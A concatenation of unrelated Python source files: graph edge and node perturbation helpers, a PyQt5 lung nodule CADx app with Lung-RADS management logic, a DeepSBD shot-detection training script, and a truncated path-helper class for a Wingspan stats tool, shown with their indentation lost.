_,invd1=all_matrix_attr(G1)
_,invd2=all_matrix_attr(G2)
for k1,v1 in pos1.items():
for k2,v2 in pos2.items():
if (transp[invd1[k1],invd2[k2]]>thresh):
plt.plot([pos1[k1][0], pos2[k2][0]]
, [pos1[k1][1], pos2[k2][1]], 'k--'
, alpha=transp[invd1[k1],invd2[k2]]/np.max(transp),lw=1)
def random_edge_removal(G, prob, seed=0):
"""
iid edge sampler to remove following Bernouilli(p = prob)
"""
np.random.seed(seed)
n = G.shape[0]
newG = G.copy()
for i in range(n):
for j in range(i+1,n):
if G[i,j] ==1:
if np.random.binomial(n=1,p=prob,size=1)[0] ==1:
newG[i,j] = newG[j,i] = 0
else:
continue
return newG
def random_edge_addition(G,prob,seed=0):
"""
add edges randomly following independent Bernouilli (p=prob)
"""
np.random.seed(seed)
n= G.shape[0]
newG= G.copy()
for i in range(n):
for j in range(i+1,n):
if G[i,j]==0:
if np.random.binomial(n=1,p=prob,size=1)[0]==1:
newG[i,j]= newG[j,i] = 1
else:
continue
return newG
def random_node_removal(G, prob, seed=0):
"""
iid edge sampler to remove following Bernouilli(p = prob)
"""
np.random.seed(seed)
n = G.shape[0]
newG = G.copy()
kept_idx = []
for idx in range(n):
if np.random.binomial(n=1,p=(1-prob),size=1)[0] ==1:
kept_idx.append(idx)
return newG[kept_idx,:][:,kept_idx] |
<filename>src/main.py
from PyQt5.QtWidgets import *
from PyQt5.uic import loadUi
from PyQt5.QtCore import pyqtSlot, Qt
from datetime import datetime
from dateutil.relativedelta import relativedelta
import sys
from detect import detect
import os
from threeD_module import CthreeD
from preferences import Preferences
import qdarkstyle
import json
from faker import Faker
import csv
import joblib
from functools import partial
# Since I use macOS to develop the app and installed NuduleNet on Windows10 to run it,
# feel free to modify it for your own usage.
use_win10 = False
pkg_name = 'mac_pkg_copy.json'
if use_win10:
os.environ['CUDA_VISIBLE_DEVICES'] = ''
import torch
import argparse
from config import config
sys.argv.append('eval')
this_module = sys.modules[__name__]
parser = argparse.ArgumentParser()
parser.add_argument('--net', '-m', metavar='NET', default=config['net'],
help='neural net')
parser.add_argument("mode", type=str,
help="you want to test or val")
parser.add_argument("--weight", type=str, default=config['initial_checkpoint'],
help="path to model weights to be used")
class NoduleCADx(QMainWindow):
def __init__(self):
super().__init__()
loadUi('mainwindow.ui', self)
self.setWindowFlags(Qt.WindowMaximizeButtonHint | Qt.WindowMinimizeButtonHint | Qt.WindowCloseButtonHint)
self.display_dialog = None
# ColumnWidth of Patient List
self.treeWidget.setColumnWidth(0, 70)
self.treeWidget.setColumnWidth(1, 100)
self.treeWidget.setColumnWidth(2, 100)
self.treeWidget.setColumnWidth(3, 50)
self.treeWidget.setColumnWidth(4, 50)
# ColumnWidth of Scan and Nodule List
self.noduletreeWidget.setColumnWidth(0, 70)
self.noduletreeWidget.setColumnWidth(1, 100)
self.noduletreeWidget.setColumnWidth(2, 100)
self.noduletreeWidget.setColumnWidth(3, 50)
self.noduletreeWidget.setColumnWidth(4, 100)
self.noduletreeWidget.setColumnWidth(5, 100)
self.noduletreeWidget.setColumnWidth(6, 100)
self.noduletreeWidget.setColumnWidth(7, 100)
self.noduletreeWidget.setColumnWidth(8, 100)
self.preferences_dialog = None
# pkg_name is the JSON file saved all the detected information (including scan path)
# create a pkg_name.json if it doesn't exist.
if not os.path.exists(pkg_name):
with open(pkg_name, 'w') as json_file:
initial_json = {'app': 'Nodule CADx', 'version': '1.0.0', "preferences":
{"threshold": "0.8",
"project_directory": os.getcwd(),
"automatic_classification": True,
"windowlevel": "?"}, 'members': []}
json.dump(initial_json, json_file, indent=2)
# load pkg_name.json
with open(pkg_name, 'r') as f:
self.data = json.load(f)
# load nodulenet and classification model and refresh patient list.
self.nodulenet_model = None
self.classification_model = None
self.load_model()
self.refresh_patient_list()
def load_model(self):
"""
Load (1)NoduleNet and (2)Classification model.
Since I didn't install NoduleNet on my macOS, so only load it on Windows10.
"""
# NoduleNet model
if use_win10:
args = parser.parse_args()
initial_checkpoint = args.weight
net = args.net
net = getattr(this_module, net)(config)
if initial_checkpoint:
print('[Loading model from %s]' % initial_checkpoint)
checkpoint = torch.load(initial_checkpoint, map_location='cpu')
net.load_state_dict(checkpoint['state_dict'], )
else:
print('No model weight file specified')
net.set_mode('eval')
net.use_mask = True
net.use_rcnn = True
self.nodulenet_model = net
else:
self.nodulenet_model = None
# Classification model
self.classification_model = joblib.load('model/classification_model.pkl')
@pyqtSlot()
def on_reportButton_clicked(self):
"""
Export system report in CSV format.
"""
report = [['Name', 'Date of Birth', 'Sex', 'Final-Score', 'Management', 'Scan Path', 'Nodule', 'Diameter',
'Type', 'Calcification', 'Spiculation', 'Perifissural', 'Endobronchial', 'Score']]
for m in self.data['members']:
report.append([m['patient_name'], m['date_of_birth'], m['sex'], m['score'], m['management']])
for s in m['scans']:
report.append(['']*5 + [s['scan_path']])
for i, n in enumerate(s['nodules'], start=1):
type_name = self.get_type_name(n['type'])
report.append(['']*6 + [f'Nodule{i}', n['diameter'], type_name, n['calcification'],
n['spiculation'], n['perifissural'], n['endobronchial'], n['score']])
with open('report.csv', 'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerows(report)
@staticmethod
def get_type_name(nodule_type):
"""
Get type name for display.
"""
if nodule_type == '1':
return 'non-solid'
elif nodule_type == '2':
return 'non/part'
elif nodule_type == '3':
return 'part-solid'
elif nodule_type == '4':
return 'part/solid'
elif nodule_type == '5':
return 'solid'
def refresh_patient_list(self):
"""
refresh patient list (upper block of main window).
"""
self.treeWidget.clear()
for m in self.data['members']:
scan_item = QTreeWidgetItem(self.treeWidget,
['\u2713' if m['updated'] else '\u2717', m['patient_name'], m['date_of_birth'],
m['sex'], m['score'], m['management']])
for i in range(scan_item.columnCount()):
scan_item.setTextAlignment(i, Qt.AlignHCenter)
def refresh_scan_list(self, member):
"""
refresh scan and nodule list (lower block of main window).
"""
self.noduletreeWidget.clear()
for scan in member['scans']:
p = QTreeWidgetItem(self.noduletreeWidget, ['\u2713' if scan['updated'] else '\u2717', scan['scan_date'],
scan['scan_path']])
if scan['updated']:
for count, nodule in enumerate(scan['nodules'], start=1):
type_name = self.get_type_name(nodule['type'])
n_item = QTreeWidgetItem(p, ['', '', f'Nodule{count}', str(nodule['prob']), str(nodule['diameter']),
type_name, str(nodule['calcification']), str(nodule['spiculation']),
str(nodule['perifissural']), str(nodule['endobronchial']),
nodule['score']])
for i in range(n_item.columnCount()):
n_item.setTextAlignment(i, Qt.AlignHCenter)
for i in range(p.columnCount()):
p.setTextAlignment(i, Qt.AlignHCenter)
self.noduletreeWidget.expandAll()
@pyqtSlot()
def on_actionPreferences_triggered(self):
if not self.preferences_dialog:
self.preferences_dialog = Preferences(self.data['preferences'])
self.preferences_dialog.rejected.connect(self.update_preferences)
self.preferences_dialog.show()
def update_preferences(self):
"""
update preferences when OK in preferences dialog is clicked.
"""
self.data['preferences'] = self.preferences_dialog.preferences
def on_treeWidget_itemClicked(self):
index_member = self.treeWidget.currentIndex().row()
self.refresh_scan_list(member=self.data['members'][index_member])
@pyqtSlot()
def on_loadscanButton_clicked(self):
fname, _filter = QFileDialog.getOpenFileName(self, 'open file', '~/Desktop', 'Scan (*.mhd *.nrrd)')
# make up some patient information for .mhd file from LUNA16
faker = Faker()
patient_name = faker.name()
birth_date = faker.date()
patient_sex = faker.profile()['sex']
scan_date = faker.date()
# For general DICOM series
'''
reader = sitk.ImageSeriesReader()
reader = sitk.ImageSeriesReader()
dir = '/Users/apple/Desktop/神農/一些參考/Patient CT EDU (Anonym-TR123)'
seriesIDs = reader.GetGDCMSeriesIDs(dir)
dcm_series = reader.GetGDCMSeriesFileNames(dir, seriesIDs[0])
reader.SetFileNames(dcm_series)
reader.MetaDataDictionaryArrayUpdateOn()
# Execute() is needed to GetMetaData
img = reader.Execute()
patient_name = reader.GetMetaData(0,'0010|0010').strip()
birth_date = reader.GetMetaData(0,'0010|0030').strip()
patient_sex = reader.GetMetaData(0,'0010|0040').strip()
'''
exist = False
for i, m in enumerate(self.data['members']):
if patient_name == m['patient_name']:
self.data['members'][i]['scans'].append({'updated': False, 'scan_path': fname,
'scan_date': scan_date, 'nodules': []})
self.data['members'][i]['updated'] = False
exist = True
if not exist:
self.data['members'].append(
{'updated': False, 'patient_name': patient_name, 'date_of_birth': birth_date, 'sex': patient_sex,
'score': '?', 'management': '?', 'scans': [{'updated': False, 'scan_path': fname,
'scan_date': scan_date, 'nodules': []}]})
self.refresh_patient_list()
@pyqtSlot()
def on_displayButton_clicked(self):
index_member = self.treeWidget.currentIndex().row()
nodule_select = None
if self.noduletreeWidget.selectedItems()[0].parent():
directory = self.noduletreeWidget.selectedItems()[0].parent().text(2)
nodule_select = self.noduletreeWidget.currentIndex().row()
index_scan = self.noduletreeWidget.indexFromItem(self.noduletreeWidget.selectedItems()[0].parent()).row()
else:
directory = self.noduletreeWidget.selectedItems()[0].text(2)
index_scan = self.noduletreeWidget.indexFromItem(self.noduletreeWidget.selectedItems()[0]).row()
self.display_dialog = CthreeD()
self.display_dialog.updata_data_signal.connect(partial(self.update_data, index_member, index_scan))
self.display_dialog.show()
self.display_dialog.w = self.display_dialog.imgLabel_1.width()
self.display_dialog.h = self.display_dialog.imgLabel_1.height()
self.display_dialog.load_dicomfile(directory=directory, nodule_select=nodule_select,
scan=self.data['members'][index_member]['scans'][index_scan])
def update_data(self, index_member, index_scan, data_csv):
self.data['members'][index_member]['scans'][index_scan]['nodules'] = []
for row in data_csv:
self.data['members'][index_member]['scans'][index_scan]['nodules'].append(row)
self.refresh_scan_list(member=self.data['members'][index_member])
self.management(index_member)
def mousePressEvent(self, event):
if app.focusWidget():
self.setFocus()
# TODO Not complete enough
def management(self, index_member=None):
"""
Get highest Lung-RADS score and match the date to show management
"""
# diameter for solid component is needed for class 4 if nodule type is part-solid
scores = []
scans_date = []
max_solid_component_diameter = 0
for s in self.data['members'][index_member]['scans']:
y, m, d = s['scan_date'].split(sep='-')
scans_date.append(datetime(int(y), int(m), int(d)))
for n in s['nodules']:
scores.append(n['score'])
if n['type'] == '3':
if eval(n['diameter']) * 0.5 > max_solid_component_diameter:
max_solid_component_diameter = eval(n['diameter']) * 0.5
newest = datetime(1000, 1, 1)
for scan_date in scans_date:
if scan_date > newest:
newest = scan_date
management = ''
if '?' in scores:
max_score = '?'
management = '?'
else:
breaker = False
max_score = '0'
for s in ['4X', '4B', '4A', '3', '2', '1', '0']:
if scores.__len__() == 0:
print('no nodule')
max_score = '1'
break
for score in scores:
if score == s:
max_score = s
breaker = True
break
if breaker:
break
if max_score == '0':
management = 'Additional lung cancer screening CT images and/or comparison to ' \
'prior chest CT examinations is needed'
elif max_score == '1' or max_score == '2':
management = f'LDCT @ {newest.date()+relativedelta(years=1)}'
elif max_score == '3':
management = f'LDCT @ {newest.date()+relativedelta(months=6)}'
elif max_score == '4A':
management = f'LDCT @ {newest.date()+relativedelta(months=3)}'
if max_solid_component_diameter >= 8:
management += ' (PET/CT may be used)'
elif max_score == '4B' or max_score == '4X':
management = f'Chest CT w/ or w/o contrast, PET/CT and/or tissue sampling may be used'
# TODO 這邊是如果有新生大結節才要的
# management += '1 month LDCT may be recommended to
# address potentially infectious or inflammatory conditions'
self.data['members'][index_member]['score'] = max_score
self.data['members'][index_member]['management'] = management
self.refresh_patient_list()
@pyqtSlot()
def on_detectButton_clicked(self):
# show status on statusbar
self.statusBar().showMessage('Model predicting, please wait for a while ...')
self.statusBar().repaint()
QApplication.instance().processEvents()
# TODO Check if selected scan is already detected
index_member = self.treeWidget.currentIndex().row()
index_scan = self.noduletreeWidget.currentIndex().row()
if use_win10:
csv_data = detect(self.data['members'][index_member]['scans'][index_scan]['scan_path'],
self.nodulenet_model, self.classification_model, self.data['preferences'])
else:
csv_data = None
self.update_data(index_member, index_scan, csv_data)
self.data['members'][index_member]['scans'][index_scan]['updated'] = True
self.refresh_scan_list(self.data['members'][index_member])
status = [scan['updated'] for scan in self.data['members'][index_member]['scans']]
if False not in status:
self.data['members'][index_member]['updated'] = True
self.refresh_patient_list()
self.statusBar().showMessage('Done.', msecs=5000)
self.management(index_member)
@pyqtSlot()
def on_savechangesButton_clicked(self):
messagebox = QMessageBox.warning(self, 'Are you sure you want to save changes?',
'You cannot undo this action, re-detect scans if necessary.',
QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)
if messagebox == QMessageBox.Ok:
with open(pkg_name, 'w') as json_file:
json.dump(self.data, json_file, indent=2)
if __name__ == '__main__':
app = QApplication(sys.argv)
app.setStyleSheet(qdarkstyle.load_stylesheet(qt_api='pyqt5'))
window = NoduleCADx()
window.show()
sys.exit(app.exec_())
|
import random
from esper.prelude import *
from rekall.video_interval_collection import VideoIntervalCollection
from rekall.temporal_predicates import *
from esper.rekall import *
import cv2
import pickle
import multiprocessing as mp
from query.models import Video, Shot
from tqdm import tqdm
import django
import sys
import os
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
from torch import optim
from torch.optim import lr_scheduler
from collections import OrderedDict
import esper.shot_detection_torch.models.deepsbd_resnet as deepsbd_resnet
import esper.shot_detection_torch.models.deepsbd_alexnet as deepsbd_alexnet
import esper.shot_detection_torch.dataloaders.movies_deepsbd as movies_deepsbd_data
# TRAINING_SET = 'kfolds'
# TRAINING_SET = '400_min'
TRAINING_SET = '4000_min'
# TRAINING_SET = '40000_min'
# TRAINING_SET = 'all_movies'
# TRAINING_SET = 'ground_truth'
# WEAK_LABELS_PATH = '/app/data/shot_detection_weak_labels/majority_vote_labels_all_windows_downsampled.npy'
# MODEL_SAVE_PATH = '/app/notebooks/learning/models/deepsbd_resnet_train_on_4000_min_majority_vote_downsampled'
WEAK_LABELS_PATH = sys.argv[1]
MODEL_SAVE_PATH = sys.argv[2]
if TRAINING_SET != 'ground_truth' and not os.path.exists(WEAK_LABELS_PATH):
"Weak labels path {} does not exist".format(WEAK_LABELS_PATH)
if not os.path.exists(MODEL_SAVE_PATH):
os.makedirs(MODEL_SAVE_PATH)
LOCAL_PATH = '/app/data'
PRETRAIN_PATH = '/app/notebooks/learning/models/resnet-18-kinetics.pth'
FOLDS_PATH = '/app/data/shot_detection_folds.pkl'
SEGS_400_MIN_PATH = '/app/data/400_minute_train.pkl'
SEGS_4000_MIN_PATH = '/app/data/4000_minute_train.pkl'
SEGS_40000_MIN_PATH = '/app/data/40000_minute_train.pkl'
SEGS_ALL_VIDEOS_PATH = '/app/data/all_videos_train.pkl'
VAL_WINDOWS = '/app/data/shot_detection_weak_labels/validation_windows_same_val_test.pkl'
TEST_WINDOWS = '/app/data/shot_detection_weak_labels/test_windows_same_val_test.pkl'
Y_VAL = '/app/data/shot_detection_weak_labels/Y_val_windows_downsampled_same_val_test.npy'
Y_TEST = '/app/data/shot_detection_weak_labels/Y_test_windows_downsampled_same_val_test.npy'
# only works for 400_min, 4000_min, all_movies
CONTINUE_PATH = None
# CONTINUE_PATH = '/app/notebooks/learning/models/deepsbd_resnet_train_on_40000_min_weak/fold1_270000_iteration.pth'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print('Initialized constants')
# load folds from disk
with open(FOLDS_PATH, 'rb') as f:
folds = pickle.load(f)
# Load DeepSBD datasets for each fold. This is used for testing.
deepsbd_datasets_weak_testing = []
for fold in folds:
shots_in_fold_qs = Shot.objects.filter(
labeler__name__contains='manual',
video_id__in = fold
)
shots_in_fold = VideoIntervalCollection.from_django_qs(shots_in_fold_qs)
data = movies_deepsbd_data.DeepSBDDataset(shots_in_fold, verbose=True,
preload=False, logits=True,
local_path=LOCAL_PATH)
deepsbd_datasets_weak_testing.append(data)
print('Loaded test data')
# load weak labels
if TRAINING_SET != 'ground_truth':
with open(WEAK_LABELS_PATH, 'rb') as f:
weak_labels_windows = np.load(f)
print('Loaded weak labels from disk')
weak_labels_collected = collect(
weak_labels_windows,
lambda row: row[0][0]
)
weak_labels_col = VideoIntervalCollection({
video_id: [
(row[0][1] ,row[0][2], row[1])
for row in weak_labels_collected[video_id]
]
for video_id in tqdm(list(weak_labels_collected.keys()))
})
print('Finished collecting weak labels')
def weak_payload_to_logits(weak_payload):
return (weak_payload[1], 0., weak_payload[0])
if TRAINING_SET == 'kfolds':
deepsbd_datasets_weak_training = []
for fold in folds:
shots_in_fold_qs = Shot.objects.filter(
labeler__name__contains='manual',
video_id__in = fold
)
shots_in_fold = VideoIntervalCollection.from_django_qs(shots_in_fold_qs)
data = movies_deepsbd_data.DeepSBDDataset(shots_in_fold, verbose=True,
preload=False, logits=True,
local_path=LOCAL_PATH)
items_collected = collect(
data.items,
lambda item: item[0]
)
items_col = VideoIntervalCollection({
video_id: [
(item[1], item[2], (item[3], item[4]))
for item in items_collected[video_id]
]
for video_id in items_collected
})
new_items = weak_labels_col.join(
items_col,
predicate=equal(),
working_window=1,
merge_op = lambda weak, item: [
(weak.start, weak.end, (weak.payload, item.payload[1]))
]
)
data.items = [
(video_id, intrvl.start, intrvl.end, weak_payload_to_logits(intrvl.payload[0]), intrvl.payload[1])
for video_id in sorted(list(new_items.get_allintervals().keys()))
for intrvl in new_items.get_intervallist(video_id).get_intervals()
]
deepsbd_datasets_weak_training.append(data)
elif TRAINING_SET in ['400_min', '4000_min', '40000_min', 'all_movies']:
with open(SEGS_400_MIN_PATH if TRAINING_SET == '400_min'
else SEGS_4000_MIN_PATH if TRAINING_SET == '4000_min'
else SEGS_40000_MIN_PATH if TRAINING_SET == '40000_min'
else SEGS_ALL_VIDEOS_PATH,
'rb') as f:
segments = VideoIntervalCollection(pickle.load(f))
print('Creating dataset')
data = movies_deepsbd_data.DeepSBDDataset(segments, verbose=True,
preload=False, logits=True,
local_path=LOCAL_PATH, stride=16)
print('Collecting')
items_collected = collect(
data.items,
lambda item: item[0]
)
print('Recreating VIC')
items_col = VideoIntervalCollection({
video_id: [
(item[1], item[2], (item[3], item[4]))
for item in items_collected[video_id]
]
for video_id in tqdm(items_collected)
})
print('Creating new items')
new_items = weak_labels_col.join(
items_col,
predicate=equal(),
working_window=1,
merge_op = lambda weak, item: [
(weak.start, weak.end, (weak.payload, item.payload[1]))
]
)
data.items = [
(video_id, intrvl.start, intrvl.end, weak_payload_to_logits(intrvl.payload[0]), intrvl.payload[1])
for video_id in sorted(list(new_items.get_allintervals().keys()))
for intrvl in new_items.get_intervallist(video_id).get_intervals()
]
deepsbd_datasets_weak_training = [data]
elif TRAINING_SET == 'ground_truth':
# Load DeepSBD datasets for validaton.
# Use validation for training.
# Split by folds
deepsbd_datasets_weak_training = []
with open(VAL_WINDOWS, 'rb') as f:
val_windows_by_video_id = pickle.load(f)
with open(Y_VAL, 'rb') as f:
Y_val = np.load(f)
paths = {
video_id: Video.objects.get(id=video_id).path
for video_id in list(set([
vid for vid, start, end in val_windows_by_video_id
]))
}
def val_to_logits(val):
""" If val is 1, positive; if val is 2, negative """
return (0, 0, 1) if val == 1 else (1, 0, 0)
shots = VideoIntervalCollection.from_django_qs(Shot.objects.filter(
labeler__name__contains="manual"
))
for fold in folds:
data_val = movies_deepsbd_data.DeepSBDDataset(shots, verbose=True,
preload=False, logits=True, local_path=LOCAL_PATH, stride=16)
data_val.set_items([
(video_id, start, end, val_to_logits(label), paths[video_id])
for (video_id, start, end), label in zip(val_windows_by_video_id, Y_val) if video_id in fold
])
deepsbd_datasets_weak_training.append(data_val)
print('Finished constructing datasets')
# dataset to hold multiple folds for weak data
class DeepSBDWeakTrainDataset(Dataset):
def __init__(self, datasets):
self.datasets = datasets
def __len__(self):
return sum(len(d) for d in self.datasets)
def __getitem__(self, idx):
for d in self.datasets:
if idx < len(d):
return d[idx]
else:
idx -= len(d)
return None
def weights_for_balanced_classes(self):
labels = [
np.argmax(item[3])
for d in self.datasets
for item in d.items
]
class_counts = [
0
for i in range(len(self.datasets[0].items[0]))
]
for l in labels:
class_counts[l] += 1
weights_per_class = {
i: len(labels) / l if l != 0 else 0
for i, l in enumerate(class_counts)
}
return [
weights_per_class[l]
for l in labels
]
# helper functions for deepsbd testing
def calculate_accuracy_logits(outputs, targets):
batch_size = targets.size(0)
_, pred = outputs.topk(1, 1, True)
pred = pred.t()
_, target_preds = targets.topk(1, 1, True)
correct = pred.eq(target_preds.view(1, -1))
n_correct_elems = correct.float().sum().item()
return n_correct_elems / batch_size
def prf1_array(pos_label, neg_label, gt, preds):
tp = 0.
fp = 0.
tn = 0.
fn = 0.
for truth, pred in zip(gt, preds):
if truth == pred:
if pred == pos_label:
tp += 1.
else:
tn += 1.
else:
if pred == pos_label:
fp += 1.
else:
fn += 1.
precision = tp / (tp + fp) if tp + fp != 0 else 0
recall = tp / (tp + fn) if tp + fn != 0 else 0
f1 = 2 * precision * recall / (precision + recall) if precision + recall != 0 else 0
return (precision, recall, f1, tp, tn, fp, fn)
def get_label(res_tensor):
res_numpy=res_tensor.data.cpu().numpy()
labels=[]
for row in res_numpy:
labels.append(np.argmax(row))
return labels
def test_deepsbd(model, dataloader):
preds = []
labels = []
outputs = []
for clip_tensor, l, _ in tqdm(dataloader):
o = model(clip_tensor.to(device))
l = torch.transpose(torch.stack(l).to(device), 0, 1).float()
preds += get_label(o)
labels += get_label(l)
outputs += o.cpu().data.numpy().tolist()
preds = [2 if p == 2 else 0 for p in preds]
precision, recall, f1, tp, tn, fp, fn = prf1_array(2, 0, labels, preds)
print("Precision: {}, Recall: {}, F1: {}".format(precision, recall, f1))
print("TP: {}, TN: {}, FP: {}, FN: {}".format(tp, tn, fp, fn))
return preds, labels, outputs
def train_iterations(iterations, training_dataloader, model, criterion, optimizer,
scheduler, fold_num=1, log_file=None, save_every=100, start_iter = 0):
i = start_iter
training_iter = iter(training_dataloader)
while i < iterations:
data = next(training_iter, None)
if data == None:
training_iter = iter(training_dataloader)
continue
i += 1
clip_tensor, targets, _ = data
outputs = model(clip_tensor.to(device))
targets = torch.transpose(torch.stack(targets).to(device), 0, 1).float()
loss = criterion(outputs, targets)
acc = calculate_accuracy_logits(outputs, targets)
preds = get_label(outputs)
preds = [2 if p == 2 else 0 for p in preds]
target_preds = get_label(targets)
precision, recall, f1, tp, tn, fp, fn = prf1_array(
2, 0, target_preds, preds)
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Epoch: [{0}/{1}]\t'
'Loss_conf {loss_c:.4f}\t'
'acc {acc:.4f}\t'
'pre {pre:.4f}\t'
'rec {rec:.4f}\t'
'f1 {f1: .4f}\t'
'TP {tp} '
'TN {tn} '
'FP {fp} '
'FN {fn} '
.format(
i, iterations, loss_c=loss.item(), acc=acc,
pre=precision, rec=recall, f1=f1,
tp=tp, tn=tn, fp=fp, fn=fn))
if log_file is not None:
log_file.write('Epoch: [{0}/{1}]\t'
'Loss_conf {loss_c:.4f}\t'
'acc {acc:.4f}\t'
'pre {pre:.4f}\t'
'rec {rec:.4f}\t'
'f1 {f1: .4f}\t'
'TP {tp} '
'TN {tn} '
'FP {fp} '
'FN {fn}\n'.format(
i, iterations, loss_c=loss.item(), acc=acc,
pre=precision, rec=recall, f1=f1,
tp=tp, tn=tn, fp=fp, fn=fn
))
if (i % save_every) == 0:
save_file_path = os.path.join(
MODEL_SAVE_PATH,
'fold{}_{}_iteration.pth'.format(fold_num, i)
)
states = {
'iteration': i,
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict()
}
torch.save(states, save_file_path)
print('Loading pretrained Kinetics data')
# resnet deepSBD pre-trained on Kinetics
deepsbd_resnet_model_no_clipshots = deepsbd_resnet.resnet18(
num_classes=3,
sample_size=128,
sample_duration=16
)
deepsbd_resnet_model_no_clipshots = deepsbd_resnet_model_no_clipshots.to(device).train()
print('Training')
if TRAINING_SET in ['kfolds', 'ground_truth']:
# train K folds
for i in range(5):
with open(os.path.join(MODEL_SAVE_PATH, '{}.log'.format(i+1)), 'w') as log_file:
training_datasets = DeepSBDWeakTrainDataset(
deepsbd_datasets_weak_training[:i] + deepsbd_datasets_weak_training[i+1:])
fold_weights = torch.DoubleTensor(training_datasets.weights_for_balanced_classes())
fold_sampler = torch.utils.data.sampler.WeightedRandomSampler(fold_weights, len(fold_weights))
training_dataloader = DataLoader(
training_datasets,
num_workers=48,
shuffle=False,
batch_size=16,
pin_memory=True,
sampler=fold_sampler
)
criterion = nn.BCEWithLogitsLoss()
# reset model
deepsbd_resnet_model_no_clipshots.load_weights(PRETRAIN_PATH)
optimizer = optim.SGD(deepsbd_resnet_model_no_clipshots.parameters(),
lr=.001, momentum=.9, weight_decay=1e-3)
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min',patience=60000)
train_iterations(
5000, training_dataloader,
deepsbd_resnet_model_no_clipshots,
criterion, optimizer, scheduler, fold_num = i + 1,
log_file = log_file, start_iter = 0, save_every=1000
)
elif TRAINING_SET in ['400_min', '4000_min', '40000_min', 'all_movies']:
with open(os.path.join(MODEL_SAVE_PATH, '{}.log'.format(TRAINING_SET)), 'a') as log_file:
#if True:
# log_file = None
training_datasets = DeepSBDWeakTrainDataset(deepsbd_datasets_weak_training)
fold_weights = torch.DoubleTensor(training_datasets.weights_for_balanced_classes())
fold_sampler = torch.utils.data.sampler.WeightedRandomSampler(fold_weights, len(fold_weights))
django.db.connections.close_all()
training_dataloader = DataLoader(
training_datasets,
num_workers=48,
shuffle=False,
batch_size=16,
pin_memory=True,
sampler=fold_sampler
)
criterion = nn.BCEWithLogitsLoss()
# reset model
deepsbd_resnet_model_no_clipshots.load_weights(PRETRAIN_PATH)
optimizer = optim.SGD(deepsbd_resnet_model_no_clipshots.parameters(),
lr=.001, momentum=.9, weight_decay=1e-3)
start_iter = 0
if CONTINUE_PATH is not None:
checkpoint = torch.load(CONTINUE_PATH)
deepsbd_resnet_model_no_clipshots.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
start_iter = checkpoint['iteration']
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min',patience=60000)
train_iterations(
(4000 if TRAINING_SET == '400_min'
else 30000 if TRAINING_SET == '4000_min'
else 400000 if TRAINING_SET == '40000_min'
else 800000 if TRAINING_SET == 'all_movies'
else 5000),
training_dataloader,
deepsbd_resnet_model_no_clipshots,
criterion, optimizer, scheduler,
log_file = log_file, start_iter = start_iter, save_every=5000 if TRAINING_SET in ['40000_min', 'all_movies'] else 1000
)
#print('Testing')
#
## test K folds
#for i in range(0, 5):
# # load
# weights = torch.load(os.path.join(
# MODEL_SAVE_PATH,
# 'fold{}_{}_iteration.pth'.format(
# i + 1 if TRAINING_SET == 'kfolds' else 1,
# (400 if TRAINING_SET == 'kfolds'
# else 4000 if TRAINING_SET == '400_min'
# else 60000 if TRAINING_SET == '4000_min'
# else 400000)
# )))['state_dict']
# deepsbd_resnet_model_no_clipshots.load_state_dict(weights)
# deepsbd_resnet_model_no_clipshots = deepsbd_resnet_model_no_clipshots.eval()
# test_dataset = deepsbd_datasets_weak_testing[i]
# dataloader = DataLoader(test_dataset, batch_size=8, shuffle=False, num_workers=16)
# test_deepsbd(deepsbd_resnet_model_no_clipshots, dataloader)
|
import os
from definitions import OUTSIDE_ROOT_DIR, INSIDE_ROOT_DIR
from src import _version
from src.utils import Utils
class Path:
"""
This class stores all the path.
"""
DEFAULT_INPUT_PATH = OUTSIDE_ROOT_DIR + "/input/"
DEFAULT_OUTPUT_PATH = OUTSIDE_ROOT_DIR + "/output/"
DEFAULT_LOG_PATH = OUTSIDE_ROOT_DIR + "/log/"
DEFAULT_DATA_PATH = INSIDE_ROOT_DIR + "/data/"
DEFAULT_DIST_PATH = OUTSIDE_ROOT_DIR + "/dist/"
DEFAULT_IMAGE_PATH = INSIDE_ROOT_DIR + "/img/"
DEFAULT_DIST_IMAGE_PATH = OUTSIDE_ROOT_DIR + "/dist/img/"
DEFAULT_ROOT_PATH = OUTSIDE_ROOT_DIR + "/"
DEFAULT_SCORE_OUTPUT_FILE_FORMAT = "score_{player_name}.png"
DEFAULT_SCORE_FILE = "scores.csv"
DEFAULT_SCORE_MODEL_FILE = "scores_model.csv"
DEFAULT_I18N_FILE = "i18n.csv"
DEFAULT_LOG_FILE = "log.log"
DEFAULT_INI_FILE = "wingspan.stats.ini"
DEFAULT_INI_MODEL_FILE = "wingspan.stats.model.ini"
DEFAULT_IMAGE_FILE = "example.png"
DEFAULT_README_FILE = "README.md"
DEFAULT_EXEC_UNIX_FILE = "wingspan-stats"
DEFAULT_EXEC_WINDOWS_FILE = "wingspan-stats.exe"
DEFAULT_ZIP_NAME = "{name}-{version}-{env}"
@staticmethod
def get_dist_path():
"""
This function returns the dist path
:return: The dist path.
"""
return Path.DEFAULT_DIST_PATH
@staticmethod
def get_output_save_path(player_name):
"""
This function returns the path where we write the score of player with player_name.
:param player_name: The name of the player.
:return: The path where we write the score of player_name.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_OUTPUT_PATH)
return os.path.join(Path.DEFAULT_OUTPUT_PATH,
Path.DEFAULT_SCORE_OUTPUT_FILE_FORMAT.format(player_name=player_name))
@staticmethod
def get_score_path():
"""
This function returns the path where we read the scores.
:return: The path where we read the scores.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_INPUT_PATH)
return os.path.join(Path.DEFAULT_INPUT_PATH, Path.DEFAULT_SCORE_FILE)
@staticmethod
def get_score_model_path():
"""
This function returns the path where we read the scores model file.
:return: The path where we read the scores model file.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_DATA_PATH)
return os.path.join(Path.DEFAULT_DATA_PATH, Path.DEFAULT_SCORE_MODEL_FILE)
@staticmethod
def get_i18n_path():
"""
This function returns the path where we read the translations.
:return: The path where we read the translations.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_DATA_PATH)
